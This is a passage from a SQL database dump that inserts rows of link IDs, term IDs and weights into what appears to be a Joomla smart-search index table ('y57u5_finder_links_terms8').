(245, 284920, 3.2),
(245, 284926, 2.6666),
(245, 284927, 0.18669),
(245, 284928, 0.93331),
(245, 284929, 1.21331),
(245, 284930, 1.02669),
(245, 285016, 0.88669),
(245, 285017, 0.98),
(245, 285018, 0.95669),
(245, 285019, 1.02669),
(245, 285020, 1.16669),
(245, 285021, 1.23669),
(245, 285022, 1.09669),
(245, 285023, 0.93331),
(245, 285024, 1.07331),
(245, 285025, 0.95669),
(245, 285026, 1.09669),
(245, 285027, 0.95669),
(245, 285028, 1.09669),
(245, 285029, 0.32669),
(245, 285030, 0.95669),
(245, 285031, 1.02669),
(245, 285032, 1.09669),
(245, 285033, 0.18669),
(245, 285034, 0.86331),
(245, 285035, 0.93331),
(246, 285341, 0.81669),
(246, 285342, 0.86331),
(246, 285343, 0.28),
(246, 285344, 0.88669),
(246, 285345, 0.93331),
(246, 285452, 0.23331),
(246, 285453, 0.86331),
(246, 285454, 0.93331),
(246, 285455, 0.86331),
(246, 285456, 1.02669),
(246, 285457, 1.05),
(246, 285458, 1.16669),
(246, 285459, 1.02669),
(246, 285460, 1.07331),
(246, 285461, 1.02669),
(246, 285462, 0.81669),
(246, 285463, 0.93331),
(246, 285464, 0.93331),
(246, 285465, 1.12),
(246, 285466, 1.00331),
(246, 285467, 0.95669),
(246, 285468, 1.02669),
(246, 285487, 0.95669),
(246, 285488, 1.07331),
(246, 285489, 1.02669),
(246, 285490, 1.21331),
(246, 285491, 0.88669),
(246, 285492, 1.12),
(246, 285493, 0.98),
(246, 285494, 1.23669),
(246, 285495, 0.88669),
(246, 285496, 0.98),
(246, 285497, 1.07331),
(246, 285498, 1.00331),
(246, 285499, 0.93331),
(246, 285500, 1.12),
(246, 285501, 0.95669),
(246, 285502, 1.05),
(246, 285503, 1.02669),
(246, 285504, 1.12),
(246, 285505, 0.95669),
(246, 285506, 1.07331),
(246, 285566, 0.88669),
(246, 285567, 0.91),
(246, 285568, 0.86331),
(246, 285569, 0.98),
(246, 285570, 0.23331),
(246, 285571, 0.95669),
(246, 285572, 1.00331),
(246, 285573, 0.93331),
(246, 285574, 1.05),
(246, 285575, 0.93331),
(246, 285576, 0.98),
(246, 285577, 1.00331),
(246, 285578, 1.09669),
(246, 285579, 1.21331),
(246, 285580, 1.21331),
(246, 285581, 1.37669),
(246, 285582, 1.02669),
(246, 285583, 0.93331),
(246, 285584, 0.98),
(246, 285585, 1.00331),
(246, 285586, 0.91),
(246, 285587, 1.07331),
(246, 285588, 0.91),
(246, 285589, 0.91),
(246, 285590, 0.93331),
(246, 285591, 1.00331),
(246, 285592, 0.81669),
(246, 285593, 0.95669),
(246, 285594, 0.23331),
(246, 285595, 0.88669),
(246, 285596, 1.00331),
(246, 285597, 0.98),
(246, 285598, 2.4666),
(246, 285599, 2.7334),
(246, 285600, 0.91),
(246, 285601, 1.05),
(246, 285614, 2.6666),
(246, 285615, 0.88669),
(246, 285616, 1.14331),
(246, 285617, 0.28),
(306, 285617, 0.28),
(246, 285618, 0.95669),
(246, 285619, 1.09669),
(246, 285620, 1.00331),
(246, 285621, 1.09669),
(246, 285622, 0.98);
INSERT INTO `y57u5_finder_links_terms8` (`link_id`, `term_id`, `weight`) VALUES
(246, 285623, 0.86331),
(246, 285624, 0.95669),
(246, 285723, 0.91),
(246, 285724, 1.05),
(246, 285725, 0.91),
(305, 285725, 0.91),
(246, 285726, 1.02669),
(246, 285727, 0.28),
(246, 285728, 0.91),
(246, 285729, 1.00331),
(246, 285730, 0.28),
(246, 285731, 0.95669),
(246, 285732, 1.05),
(246, 285733, 1.07331),
(246, 285734, 1.28331),
(246, 285735, 1.21331),
(246, 285736, 1.4),
(246, 285737, 0.86331),
(246, 285738, 0.95669),
(246, 285739, 0.32669),
(246, 285740, 1.16669),
(246, 285741, 1.26),
(246, 285742, 0.23331),
(246, 285743, 0.93331),
(246, 285744, 1.02669),
(246, 285745, 0.95669),
(246, 285746, 1.05),
(246, 285747, 0.88669),
(246, 285748, 1.02669),
(247, 286399, 1.54),
(247, 286400, 0.91),
(247, 286401, 0.93331),
(247, 286402, 0.81669),
(247, 286403, 0.91),
(247, 286404, 0.84),
(247, 286405, 0.88669),
(247, 286406, 0.81669),
(247, 286407, 0.91),
(247, 286485, 0.42),
(247, 286486, 1.09669),
(247, 286487, 1.16669),
(247, 286488, 0.23331),
(247, 286489, 0.95669),
(247, 286490, 1.07331),
(247, 286491, 0.98),
(247, 286492, 1.05),
(247, 286493, 1.09669),
(247, 286494, 1.23669),
(247, 286495, 0.51331),
(247, 286496, 1.02669),
(247, 286497, 1.12),
(247, 286498, 8.96),
(247, 286499, 1.09669),
(247, 286500, 0.91),
(247, 286501, 1.00331),
(247, 286502, 1.02669),
(247, 286503, 1.02669),
(247, 286504, 0.18669),
(247, 286505, 0.93331),
(247, 286506, 1.02669),
(247, 286523, 0.91),
(292, 286523, 0.91),
(247, 286524, 1.12),
(247, 286525, 0.95669),
(247, 286526, 1.09669),
(247, 286527, 1.07331),
(247, 286559, 1.14331),
(247, 286560, 0.93331),
(247, 286561, 0.46669),
(247, 286562, 1.00331),
(247, 286563, 1.09669),
(247, 286564, 1.05),
(247, 286565, 1.12),
(247, 286566, 0.88669),
(290, 286566, 1.77338),
(247, 286567, 1.07331),
(247, 286568, 1.02669),
(247, 286569, 1.14331),
(247, 286570, 1.82),
(247, 286571, 1.91338),
(247, 286572, 0.91),
(247, 286573, 1.05),
(247, 286574, 1.05),
(247, 286575, 2.4666),
(247, 286576, 3.2666),
(247, 286590, 2.6666),
(247, 286591, 0.95669),
(247, 286592, 0.93331),
(247, 286593, 1.02669),
(247, 286594, 0.98),
(247, 286595, 1.07331),
(247, 286596, 0.91),
(247, 286597, 1.09669),
(247, 286598, 1.07331),
(247, 286665, 0.32669),
(247, 286666, 0.93331),
(247, 286667, 1.05),
(247, 286668, 1.09669),
(247, 286669, 0.98),
(247, 286670, 0.95669),
(247, 286671, 1.05),
(247, 286672, 1.05),
(247, 286673, 1.12),
(247, 286674, 1.02669),
(247, 286675, 1.12),
(247, 286676, 0.32669),
(247, 286677, 0.95669),
(247, 286678, 1.05),
(247, 286679, 0.32669),
(247, 286680, 0.93331),
(247, 286681, 1.12),
(247, 286682, 0.32669),
(247, 286683, 0.91),
(247, 286684, 1.00331),
(247, 286685, 1.91338),
(247, 286686, 2.00662),
(247, 286687, 0.28),
(247, 286688, 0.98),
(247, 286689, 1.05),
(247, 286690, 0.23331),
(247, 286691, 0.88669),
(247, 286692, 1.02669),
(247, 286693, 0.23331),
(247, 286694, 0.95669),
(247, 286695, 1.16669),
(247, 286696, 1.21331),
(248, 287335, 1.02669),
(248, 287336, 1.19),
(248, 287423, 0.95669),
(248, 287424, 1.09669),
(248, 287425, 0.95669),
(248, 287426, 1.02669),
(248, 287427, 1.19),
(248, 287428, 0.91),
(248, 287452, 0.95669),
(248, 287453, 1.09669),
(248, 287454, 1.16669),
(248, 287455, 1.23669),
(248, 287456, 0.98),
(248, 287457, 1.05),
(248, 287458, 0.95669),
(248, 287459, 1.00331),
(248, 287460, 1.09669),
(248, 287461, 0.32669),
(248, 287462, 1.07331),
(248, 287463, 1.30669),
(248, 287464, 0.95669),
(248, 287465, 1.05),
(248, 287466, 1.07331),
(248, 287467, 1.09669),
(248, 287468, 1.05),
(248, 287469, 1.12),
(248, 287470, 1.00331),
(248, 287471, 1.12),
(248, 287502, 0.93331),
(248, 287503, 0.98),
(248, 287504, 0.95669),
(248, 287505, 1.02669),
(248, 287506, 1.07331),
(248, 287507, 0.86331),
(248, 287508, 0.98),
(248, 287509, 0.86331),
(248, 287510, 0.93331),
(248, 287511, 0.37331),
(248, 287512, 0.95669),
(248, 287513, 1.14331),
(248, 287514, 1.02669),
(248, 287515, 1.19),
(248, 287516, 1.07331),
(248, 287517, 1.16669),
(248, 287518, 1.05),
(248, 287519, 1.23669),
(248, 287520, 1.14331),
(248, 287521, 1.23669),
(248, 287522, 0.79331),
(248, 287523, 0.93331),
(248, 287524, 1.07331),
(248, 287525, 0.84),
(248, 287526, 0.95669),
(248, 287527, 0.93331),
(248, 287528, 1.05),
(248, 287529, 0.93331),
(248, 287530, 2.4666),
(248, 287531, 3.0666),
(248, 287543, 2.6666),
(248, 287544, 1.07331),
(248, 287632, 0.28),
(248, 287633, 0.91),
(248, 287634, 1.02669),
(248, 287635, 0.95669),
(248, 287636, 1.07331),
(248, 287637, 1.05),
(248, 287638, 0.91),
(248, 287639, 1.02669),
(248, 287640, 1.05),
(248, 287641, 1.00331),
(248, 287642, 1.21331),
(248, 287643, 0.37331),
(248, 287644, 0.95669),
(248, 287645, 1.02669),
(248, 287646, 0.28),
(248, 287647, 0.88669),
(248, 287648, 0.95669),
(248, 287649, 0.84),
(306, 287649, 0.84),
(248, 287650, 0.91),
(306, 287650, 0.91),
(248, 287651, 1.02669),
(248, 287652, 1.09669),
(249, 288366, 0.28),
(249, 288367, 0.91),
(249, 288368, 1.00331),
(249, 288450, 0.14),
(249, 288451, 0.81669),
(249, 288452, 0.95669),
(249, 288453, 0.95669),
(249, 288454, 1.16669),
(249, 288455, 1.00331),
(249, 288456, 1.00331),
(249, 288457, 1.30669),
(249, 288458, 1.00331),
(249, 288459, 1.14331),
(249, 288460, 0.86331),
(249, 288461, 0.91),
(249, 288462, 0.65338),
(305, 288462, 0.98007),
(249, 288463, 1.91338),
(249, 288464, 1.16669),
(249, 288465, 1.05),
(249, 288466, 1.05),
(249, 288467, 1.12),
(249, 288468, 1.07331),
(290, 288468, 1.07331),
(249, 288469, 1.14331),
(249, 288470, 0.88669),
(249, 288471, 1.02669),
(249, 288472, 1.02669),
(249, 288473, 1.12),
(249, 288474, 1.14331),
(249, 288499, 0.93331),
(249, 288500, 1.05),
(249, 288501, 0.91),
(249, 288502, 1.14331),
(249, 288503, 2.32339),
(249, 288504, 2.72),
(249, 288505, 1.00331),
(249, 288506, 1.19),
(249, 288507, 0.91),
(249, 288508, 1.09669),
(249, 288509, 0.88669),
(290, 288509, 0.88669),
(249, 288510, 1.00331),
(290, 288510, 1.00331),
(249, 288511, 1.05),
(249, 288512, 0.88669),
(249, 288513, 1.07331),
(249, 288514, 0.93331),
(249, 288515, 1.07331),
(249, 288516, 0.98),
(249, 288517, 1.07331),
(249, 288518, 1.02669),
(249, 288519, 0.91),
(249, 288520, 1.12),
(249, 288521, 1.09669),
(249, 288522, 0.95669),
(249, 288523, 1.02669),
(249, 288524, 1.21331),
(249, 288525, 0.98),
(249, 288526, 1.07331),
(249, 288592, 1.02669),
(249, 288593, 0.95669),
(249, 288594, 0.37331),
(249, 288595, 0.95669),
(249, 288596, 1.05),
(249, 288597, 1.09669),
(249, 288598, 0.95669),
(249, 288599, 0.98),
(249, 288600, 0.86331),
(249, 288601, 0.95669),
(249, 288602, 0.93331),
(249, 288603, 1.21331),
(249, 288604, 0.88669),
(249, 288605, 0.95669),
(249, 288606, 0.91),
(249, 288607, 2.4666),
(249, 288608, 3),
(249, 288617, 2.6666),
(249, 288677, 0.91),
(249, 288678, 1.02669),
(249, 288679, 1.16669),
(249, 288680, 0.28),
(249, 288681, 1.02669),
(249, 288682, 1.07331),
(249, 288683, 0.46669),
(249, 288684, 1.00331),
(249, 288685, 1.16669),
(249, 288686, 1.02669),
(249, 288687, 1.14331),
(249, 288688, 1.00331),
(249, 288689, 1.07331),
(249, 288690, 0.98),
(249, 288691, 1.14331),
(249, 288692, 0.98),
(249, 288693, 1.07331),
(249, 288694, 1.00331),
(249, 288695, 1.07331),
(249, 288696, 0.93331),
(249, 288697, 0.98),
(250, 289350, 0.93331),
(250, 289351, 1.00331),
(250, 289352, 0.28),
(250, 289353, 0.93331),
(250, 289354, 1.05),
(250, 289355, 7.22019),
(250, 289356, 7.98),
(250, 289357, 7.98),
(250, 289358, 1.09669),
(250, 289359, 7.02981),
(250, 289360, 7.79019),
(250, 289361, 2.4),
(250, 289362, 2.8),
(250, 289363, 2.6),
(251, 289412, 3.73324),
(251, 289413, 3.29007),
(251, 289414, 1.07331),
(251, 289423, 4.38676),
(251, 289424, 2.4),
(251, 289425, 2.6666),
(251, 289426, 2.6),
(251, 289448, 0.14),
(251, 289449, 0.93331),
(251, 289450, 1.05),
(251, 289451, 0.28),
(251, 289452, 1.00331),
(251, 289453, 1.12),
(252, 289529, 2.6666),
(252, 289622, 1.05),
(252, 289623, 1.07331),
(252, 289624, 1.05),
(252, 289625, 1.12),
(252, 289626, 1.02669),
(252, 289627, 1.12),
(252, 289628, 1.05),
(252, 289629, 1.14331),
(252, 289630, 0.95669),
(252, 289631, 1.16669),
(252, 289632, 0.88669),
(252, 289633, 1.02669),
(252, 289634, 0.37331),
(252, 289635, 0.98),
(252, 289636, 1.09669),
(252, 289637, 1.11993),
(252, 289638, 1.00331),
(252, 289639, 1.14331),
(252, 289640, 1.00331),
(252, 289641, 1.21331),
(252, 289642, 1.09669),
(252, 289643, 1.19),
(252, 289644, 2.49339),
(252, 289645, 0.84),
(252, 289646, 0.91),
(252, 289647, 0.91),
(252, 289648, 1.02669),
(252, 289649, 0.81669),
(252, 289650, 0.88669),
(252, 289651, 0.95669),
(252, 289652, 1.02669),
(252, 289653, 1.02669),
(252, 289654, 0.95669),
(252, 289655, 0.91),
(252, 289656, 1.00331),
(252, 289657, 0.93331),
(252, 289658, 1.00331),
(252, 289659, 1.77338),
(252, 289660, 0.95669),
(252, 289661, 0.98),
(252, 289662, 1.77338),
(252, 289663, 2.00662),
(252, 289664, 0.86331),
(252, 289665, 0.91),
(252, 289672, 1.14331),
(252, 289673, 0.93331),
(252, 289674, 1.05),
(252, 289675, 0.18669),
(252, 289676, 0.93331),
(252, 289677, 1.02669),
(252, 289678, 1.12),
(252, 289679, 0.98),
(252, 289680, 1.09669),
(252, 289722, 1.00331),
(252, 289723, 1.02669),
(252, 289724, 0.84),
(252, 289725, 0.95669),
(252, 289726, 0.37331),
(252, 289727, 1.05),
(252, 289728, 1.21331),
(252, 289729, 0.93338),
(252, 289730, 1.02669),
(252, 289731, 1.16669),
(252, 289732, 1.14331),
(252, 289733, 1.23669),
(252, 289734, 1.02669),
(252, 289735, 1.12),
(252, 289736, 0.95669),
(252, 289737, 0.98),
(252, 289738, 0.95669),
(252, 289739, 0.81669),
(252, 289740, 0.93331),
(252, 289741, 0.95669),
(252, 289742, 0.32669),
(252, 289743, 0.93331),
(252, 289744, 1.00331),
(252, 289745, 0.88669),
(252, 289746, 1.00331),
(252, 289747, 1.07331),
(252, 289748, 0.91),
(252, 289749, 2.00662),
(252, 289750, 1.02669),
(252, 289751, 0.91),
(292, 289751, 1.82),
(252, 289752, 1.00331),
(252, 289753, 1.09669),
(252, 289754, 1.05),
(252, 289755, 1.26),
(252, 289756, 0.88669),
(252, 289757, 1.05),
(252, 289758, 1.05),
(252, 289759, 1.02669),
(252, 289760, 1.86662),
(252, 289761, 0.93331),
(252, 289762, 1.02669),
(252, 289763, 0.95669),
(306, 289763, 0.95669),
(252, 289764, 2.4),
(252, 289765, 3),
(252, 289770, 2.6),
(252, 289771, 0.95669),
(252, 289772, 1.07331),
(252, 289773, 0.98),
(252, 289774, 1.07331),
(252, 289775, 0.95669),
(252, 289776, 1.07331),
(252, 289777, 0.93331),
(252, 289778, 1.05),
(252, 289779, 0.98),
(252, 289852, 1.02669),
(252, 289853, 1.12),
(252, 289854, 0.95669),
(252, 289855, 1.07331),
(252, 289856, 1.14331),
(252, 289857, 1.07331),
(252, 289858, 1.21331),
(252, 289859, 1.30669),
(252, 289860, 2.14662),
(252, 289861, 2.43661),
(252, 289862, 2.83339),
(252, 289863, 1.07331),
(252, 289864, 1.96),
(252, 289865, 1.07331),
(252, 289866, 1.05),
(252, 289867, 1.00331),
(252, 289868, 1.12),
(252, 289869, 1.09669),
(252, 289870, 1.19),
(252, 289871, 0.95669),
(252, 289872, 1.02669),
(252, 289873, 1.05),
(252, 289874, 1.02669),
(252, 289875, 1.07331),
(252, 289876, 0.91),
(252, 289877, 1.02669),
(252, 289878, 0.98),
(305, 289878, 0.98),
(252, 289879, 1.07331),
(252, 289880, 0.95669),
(252, 289881, 1.05),
(252, 289882, 1.00331),
(252, 289883, 1.09669),
(252, 289884, 0.95669),
(252, 289885, 1.07331),
(253, 290674, 0.32669),
(253, 290675, 1.02669),
(253, 290676, 1.12),
(253, 290677, 0.46669),
(253, 290678, 1.02669),
(253, 290679, 1.14331),
(253, 290680, 0.23331),
(253, 290681, 0.93331),
(253, 290682, 1.05),
(253, 290683, 0.98),
(253, 290684, 1.09669),
(253, 290685, 0.56),
(253, 290686, 1.07331),
(253, 290687, 1.16669),
(253, 290688, 0.95669),
(253, 290689, 1.16669),
(253, 290690, 1.07331),
(253, 290691, 1.16669),
(253, 290692, 1.09669),
(253, 290693, 1.00331),
(253, 290694, 0.95669),
(253, 290695, 1.07331),
(253, 290696, 1.00331),
(253, 290707, 0.98),
(253, 290708, 1.12),
(253, 290709, 1.02669),
(253, 290710, 1.12),
(253, 290711, 0.28),
(253, 290712, 1.00331),
(253, 290713, 1.09669),
(253, 290714, 1.00331),
(253, 290715, 1.12),
(253, 290716, 0.23331),
(253, 290717, 0.88669),
(253, 290718, 1.07331),
(253, 290719, 0.88669),
(253, 290720, 0.95669),
(253, 290721, 0.37331),
(253, 290722, 0.95669),
(253, 290723, 1.07331),
(253, 290724, 0.23331),
(253, 290725, 0.88669),
(253, 290726, 1.14331),
(253, 290727, 0.86331),
(253, 290728, 0.95669),
(253, 290729, 0.46669),
(288, 290729, 0.46669),
(253, 290730, 1.19),
(253, 290731, 1.37669),
(253, 290732, 0.32669),
(253, 290733, 1.09669),
(253, 290734, 1.16669),
(253, 290804, 1.02669),
(253, 290805, 0.98),
(253, 290806, 0.95669),
(253, 290807, 0.98),
(253, 290808, 0.95669),
(253, 290809, 1.07331),
(306, 290810, 0.95669),
(253, 290810, 1.91338),
(253, 290811, 1.02669),
(253, 290812, 0.91),
(253, 290813, 0.88669),
(253, 290814, 0.95669),
(253, 290815, 7.02317),
(253, 290816, 1.12),
(253, 290817, 1.21331),
(253, 290818, 0.98),
(253, 290819, 0.28),
(253, 290820, 0.95669),
(253, 290821, 1.05),
(253, 290822, 0.88669),
(253, 290823, 0.93331),
(253, 290824, 0.91),
(253, 290825, 0.95669),
(253, 290826, 1.12),
(253, 290827, 0.93331),
(253, 290828, 1.16669),
(253, 290829, 0.93331),
(253, 290830, 1.05),
(253, 290831, 0.95669),
(253, 290832, 0.95669),
(253, 290833, 1.02669),
(253, 290834, 1.00331),
(253, 290835, 1.12),
(253, 290836, 9.12),
(253, 290837, 0.91),
(253, 290838, 0.98),
(253, 290839, 2.4666),
(253, 290840, 2.7334),
(253, 290850, 2.6666),
(253, 290851, 0.98),
(253, 290852, 1.14331),
(253, 290853, 0.95669),
(253, 290854, 1.05),
(253, 290855, 0.28),
(253, 290856, 0.93331),
(253, 290857, 1.00331),
(253, 290858, 0.91),
(253, 290859, 1.02669),
(253, 290974, 0.98),
(253, 290975, 1.09669),
(253, 290976, 1.02662),
(253, 290977, 1.05),
(253, 290978, 1.14331),
(253, 290979, 1.07331),
(253, 290980, 1.26),
(288, 290981, 0.91),
(304, 290981, 0.91),
(306, 290981, 0.91),
(253, 290981, 3.64),
(253, 290982, 1.00331),
(253, 290983, 1.05),
(253, 290984, 1.02669),
(253, 290985, 1.05),
(253, 290986, 0.98),
(253, 290987, 1.12),
(253, 290988, 0.95669),
(253, 290989, 1.07331),
(253, 290990, 0.95669),
(253, 290991, 1.07331),
(253, 290992, 1.05),
(253, 290993, 1.12),
(253, 290994, 1.91338),
(253, 290995, 1.05),
(253, 290996, 1.05),
(253, 290997, 0.91),
(253, 290998, 1.00331),
(253, 290999, 0.91),
(253, 291000, 1.00331),
(253, 291001, 0.93331),
(253, 291002, 1.05),
(253, 291003, 0.88669),
(253, 291004, 0.98),
(253, 291005, 0.93331),
(253, 291006, 1.05),
(253, 291007, 1.00331),
(253, 291008, 1.12),
(253, 291009, 0.93331),
(253, 291010, 1.00331),
(253, 291011, 0.91),
(253, 291012, 1.02669),
(253, 291013, 1.91338),
(253, 291014, 1.02669),
(253, 291015, 1.07331),
(253, 291016, 0.93331),
(253, 291017, 1.05),
(253, 291018, 0.98),
(253, 291019, 1.09669),
(253, 291020, 0.93331),
(253, 291021, 1.05),
(253, 291022, 0.93331),
(253, 291023, 1.07331),
(253, 291024, 0.32669),
(253, 291025, 0.93331),
(253, 291026, 1.09669),
(253, 291027, 0.91),
(253, 291028, 1.00331),
(253, 291029, 1.00331),
(253, 291030, 1.07331),
(253, 291031, 1.00331),
(253, 291032, 1.12),
(253, 291033, 0.42),
(253, 291034, 1.12),
(253, 291035, 1.19),
(253, 291036, 0.46669),
(253, 291037, 1.12),
(253, 291038, 1.4),
(253, 291039, 0.37331),
(253, 291040, 0.98),
(253, 291041, 1.16669),
(253, 291042, 0.95669),
(253, 291043, 1.16669),
(253, 291044, 0.98),
(253, 291045, 1.09669),
(253, 291046, 0.95669),
(253, 291047, 1.00331),
(253, 291048, 0.46669),
(253, 291049, 1.05),
(253, 291050, 1.14331),
(254, 291793, 1.02669),
(254, 291794, 1.14331),
(254, 291795, 0.88669),
(254, 291796, 0.98),
(254, 291797, 1.09669),
(254, 291798, 0.95669),
(254, 291799, 1.09669),
(254, 291800, 0.42),
(254, 291801, 1.02669),
(254, 291802, 1.12),
(254, 291803, 0.42),
(254, 291804, 1.00331),
(254, 291805, 1.07331),
(254, 291806, 0.91),
(254, 291807, 1.02669),
(254, 291808, 0.95669),
(254, 291809, 1.07331),
(254, 291810, 0.28),
(254, 291811, 0.98),
(254, 291812, 1.16669),
(254, 291813, 1.19),
(254, 291814, 1.02669),
(254, 291815, 1.14331),
(254, 291816, 1.33),
(254, 291817, 1.19),
(254, 291818, 0.91),
(254, 291819, 0.91),
(254, 291820, 1.00331),
(254, 291821, 0.98),
(254, 291822, 0.95669),
(254, 291823, 1.09669),
(254, 291824, 0.91),
(254, 291825, 1.00331),
(254, 291826, 0.95669),
(254, 291827, 1.05),
(254, 291828, 0.91),
(254, 291829, 1.02669),
(254, 291830, 0.91),
(254, 291831, 1.00331),
(254, 291832, 1.02669),
(254, 291833, 1.09669),
(254, 291834, 0.93331),
(254, 291835, 1.12),
(254, 291836, 1.00331),
(254, 291837, 1.26),
(254, 291838, 0.98),
(254, 291839, 1.09669),
(254, 291840, 2.87007),
(254, 291841, 3.42993),
(254, 291842, 2.19338),
(254, 291843, 1.33),
(254, 291844, 1.21331),
(254, 291845, 1.02669),
(254, 291846, 1.12),
(254, 291847, 0.95669),
(254, 291848, 1.14331),
(254, 291849, 0.42),
(254, 291850, 1.07331),
(254, 291851, 1.14331),
(254, 291876, 0.98),
(254, 291877, 1.05),
(254, 291878, 0.86331),
(254, 291879, 0.91),
(254, 291880, 0.88669),
(254, 291881, 1.07331),
(254, 291882, 0.95669),
(254, 291883, 1.05),
(254, 291884, 1.05),
(254, 291885, 0.91),
(254, 291886, 1.02669),
(254, 291887, 0.98),
(254, 291888, 1.12),
(254, 291889, 1.09669),
(254, 291890, 0.91),
(254, 291891, 1.05),
(254, 291892, 1.05),
(254, 291893, 0.93331),
(254, 291894, 1.02669),
(254, 291895, 0.86331),
(254, 291896, 0.95669),
(254, 291897, 6),
(254, 291898, 2.66339),
(254, 291899, 0.98),
(254, 291900, 1.07331),
(254, 291901, 0.91),
(254, 291902, 0.95669),
(254, 291903, 1.09669),
(254, 291904, 1.14331),
(254, 291905, 1.30669),
(254, 291906, 0.98),
(254, 291907, 1.05),
(254, 291908, 0.84),
(254, 291909, 0.95669),
(254, 291910, 1.00331),
(254, 291911, 1.16669),
(254, 291912, 1.12),
(295, 291913, 0.88669),
(306, 291913, 0.88669),
(254, 291913, 1.77338),
(254, 291914, 2.00662),
(254, 291915, 0.93331),
(254, 291916, 1.00331),
(254, 291917, 1.09669),
(254, 291918, 0.95669),
(254, 291919, 1.05),
(254, 291920, 1.05),
(254, 291921, 1.19),
(254, 291922, 0.91),
(254, 291923, 1.05),
(254, 291924, 1.00331),
(254, 291925, 1.09669),
(254, 291977, 1.00331),
(254, 291978, 0.42),
(254, 291979, 1.02669),
(254, 291980, 1.14331),
(254, 291981, 1.12),
(254, 291982, 1.07331),
(254, 291983, 1.30669),
(254, 291984, 1.09669),
(254, 291985, 1.16669),
(254, 291986, 0.95669),
(254, 291987, 0.98),
(254, 291988, 1.05),
(254, 291989, 0.93331),
(254, 291990, 1.14331),
(254, 291991, 0.98),
(254, 291992, 0.95669),
(254, 291993, 1.05),
(254, 291994, 0.42),
(254, 291995, 1.02669),
(254, 291996, 1.26),
(254, 291997, 1.05),
(254, 291998, 0.86331),
(254, 291999, 1.00331),
(254, 292000, 0.98),
(254, 292001, 0.91),
(254, 292002, 0.93331),
(254, 292003, 1.05),
(254, 292004, 0.91),
(254, 292005, 1.12),
(254, 292006, 0.95669),
(254, 292007, 0.86331),
(254, 292008, 1.02669),
(254, 292009, 3.00993),
(254, 292010, 0.84),
(254, 292011, 0.91),
(254, 292012, 1.00331),
(254, 292013, 0.98),
(254, 292014, 0.93331),
(254, 292015, 0.93331),
(254, 292016, 0.86331),
(254, 292017, 1.00331),
(254, 292018, 0.84),
(254, 292019, 0.95669),
(254, 292020, 0.86331),
(254, 292021, 0.98),
(254, 292022, 0.98),
(254, 292023, 0.98),
(254, 292024, 0.95669),
(254, 292025, 0.91),
(254, 292026, 0.98),
(254, 292027, 1.09669),
(254, 292028, 1.96),
(254, 292029, 0.86331),
(254, 292030, 0.93331),
(254, 292031, 0.95669),
(254, 292032, 0.91),
(254, 292033, 1.05),
(254, 292034, 2.4666),
(254, 292035, 2.9334),
(254, 292047, 2.6666),
(254, 292048, 0.93331),
(254, 292049, 1.07331),
(254, 292050, 0.98),
(254, 292051, 1.14331),
(254, 292052, 0.86331),
(254, 292053, 0.98),
(254, 292054, 0.98),
(254, 292055, 1.00331),
(254, 292056, 1.00331),
(254, 292057, 1.02669),
(254, 292058, 0.88669),
(254, 292059, 1.05),
(254, 292200, 0.91),
(254, 292201, 1.09669),
(254, 292202, 1.02669),
(254, 292203, 1.09669),
(254, 292204, 1.07331),
(254, 292205, 1.05),
(254, 292206, 1.02669),
(254, 292207, 1.14331),
(254, 292208, 1.14331),
(254, 292209, 0.42),
(254, 292210, 1.12),
(254, 292211, 1.23669),
(254, 292212, 0.98),
(254, 292213, 1.07331),
(254, 292214, 0.42),
(254, 292215, 1.02669),
(254, 292216, 1.16669),
(254, 292217, 1.05),
(254, 292218, 1.00331),
(254, 292219, 1.14331),
(254, 292220, 0.91),
(254, 292221, 1.00331),
(254, 292222, 0.51331),
(254, 292223, 1.02669),
(254, 292224, 1.26),
(255, 292620, 0.93331),
(255, 292621, 1.19),
(255, 292708, 0.98),
(255, 292709, 1.07331),
(255, 292710, 1.02669),
(255, 292711, 1.02669),
(255, 292712, 1.14331),
(255, 292713, 2.38),
(255, 292714, 0.95669),
(255, 292715, 1.02669),
(255, 292716, 0.95669),
(255, 292717, 1.02669),
(255, 292718, 0.93331),
(255, 292719, 1.07331),
(255, 292720, 1.09669),
(255, 292721, 1.12),
(255, 292734, 2.66339),
(255, 292735, 1.07331),
(255, 292736, 1.28331),
(255, 292737, 1.14331),
(255, 292738, 1.09669),
(255, 292739, 1.23669),
(255, 292740, 1.00331),
(255, 292741, 0.93331),
(255, 292742, 1.96),
(255, 292743, 1.07331),
(255, 292744, 1.00331),
(255, 292782, 1.02669),
(255, 292783, 1.00331),
(255, 292784, 1.00331),
(255, 292785, 1.09669),
(255, 292786, 0.95669),
(304, 292786, 0.95669),
(255, 292787, 0.98),
(255, 292788, 1.00331),
(255, 292789, 0.93331),
(255, 292790, 1.09669),
(255, 292791, 1.82),
(255, 292792, 2.14662),
(255, 292793, 1.02669),
(255, 292794, 0.93331),
(255, 292795, 1.05),
(255, 292796, 0.93331),
(255, 292797, 1.05),
(255, 292798, 1.00331),
(255, 292799, 1.09669),
(255, 292800, 0.93331),
(255, 292801, 0.95669),
(306, 292801, 0.95669),
(255, 292802, 1.05),
(255, 292803, 0.79331),
(255, 292804, 0.93331),
(255, 292805, 0.93331),
(255, 292806, 1.09669),
(255, 292807, 0.93331),
(255, 292808, 0.95669),
(255, 292809, 0.95669),
(255, 292810, 0.95669),
(255, 292811, 0.88669),
(255, 292812, 0.95669),
(255, 292813, 1.00331),
(255, 292814, 0.18669),
(255, 292815, 0.84),
(255, 292816, 0.98),
(255, 292817, 2.4666),
(255, 292818, 2.8),
(255, 292823, 2.6666),
(255, 292824, 0.18669),
(255, 292825, 0.86331),
(255, 292826, 1.05),
(255, 292827, 0.91),
(255, 292828, 0.98),
(255, 292902, 1.12),
(255, 292903, 1.23669),
(255, 292904, 1.00331),
(255, 292905, 1.12),
(255, 292906, 1.12),
(255, 292907, 0.32669),
(255, 292908, 0.98),
(255, 292909, 1.02669),
(255, 292910, 0.93331),
(255, 292911, 1.07331),
(255, 292912, 1.02669),
(255, 292913, 1.14331),
(255, 292914, 0.95669),
(255, 292915, 1.07331),
(255, 292916, 0.95669),
(255, 292917, 1.05),
(255, 292918, 1.12),
(256, 293247, 0.98),
(256, 293248, 1.07331),
(256, 293249, 0.95669),
(256, 293250, 1.23669),
(256, 293251, 0.56),
(256, 293252, 1.07331),
(256, 293253, 1.16669),
(256, 293254, 0.42),
(256, 293255, 1.02669),
(256, 293256, 1.14331),
(256, 293257, 0.95669),
(256, 293258, 1.16669),
(256, 293259, 1.91338),
(256, 293260, 2.14662),
(256, 293261, 1.05),
(256, 293262, 1.21331),
(256, 293263, 1.05),
(256, 293264, 1.91338),
(256, 293265, 2.05338),
(256, 293266, 0.88669),
(256, 293267, 0.95669),
(256, 293268, 0.95669),
